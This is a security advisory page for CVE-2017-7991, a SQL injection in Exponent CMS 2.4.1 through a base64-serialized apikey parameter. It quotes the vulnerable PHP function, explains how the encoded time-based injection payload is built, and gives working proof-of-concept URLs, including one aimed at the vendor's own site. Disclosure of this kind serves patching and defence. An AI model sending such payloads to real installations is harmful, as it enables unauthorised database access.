Exponent CMS 2.4.1 SQL Injection

Published
Credit
Risk
2017.04.22
404notfound
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2017-7991
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

CVE-2017-7991-SQL injection-Exponent CMS

[Suggested description]
Exponent CMS 2.4.1 and earlier has SQL injection via a base64
serialized API key (apikey parameter) in the api function of
framework/modules/eaas/controllers/eaasController.php.

------------------------------------------

[Additional Information]
Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php
Vulnerable function is api.

public function api() {
if (empty($this->params['apikey'])) {
$_REQUEST['apikey'] = true; // set this to force an ajax reply
$ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
$ar->send(); //FIXME this doesn't seem to work correctly in this scenario
} else {
echo $this->params['apikey'];
$key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));
echo $key;

$cfg = new expConfig($key);
$this->config = $cfg->config;
if(empty($cfg->id)) {
$ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
$ar->send();
} else {
if (!empty($this->params['get'])) {
$this->handleRequest();
} else {
$ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
$ar->send();
}
}
}
}

We can control param $apikey by using base64_encode and serialize
functions to encrypt the SQL injection string. Then, the $apikey will
be decrypted and cause SQL injection. Such as, if we want to use
"aaa\'or sleep(2)#" to inject, we should use "echo
base64_encode(serialize($apikey));" to encrypt the Attack string:
czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
is the PoC. The result is: the site will sleep several seconds, and
you can see SQL injection is successful in MySQL logs.

------------------------------------------

[Vulnerability Type]
SQL Injection

------------------------------------------

[Vendor of Product]
Exponent CMS

------------------------------------------

[Affected Product Code Base]
Exponent CMS - 2.4.1 and earlier

------------------------------------------

[Affected Component]
\framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Information Disclosure]
true

------------------------------------------

[Attack Vectors]
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7

http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7

------------------------------------------

[Discoverer]
404notfound



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com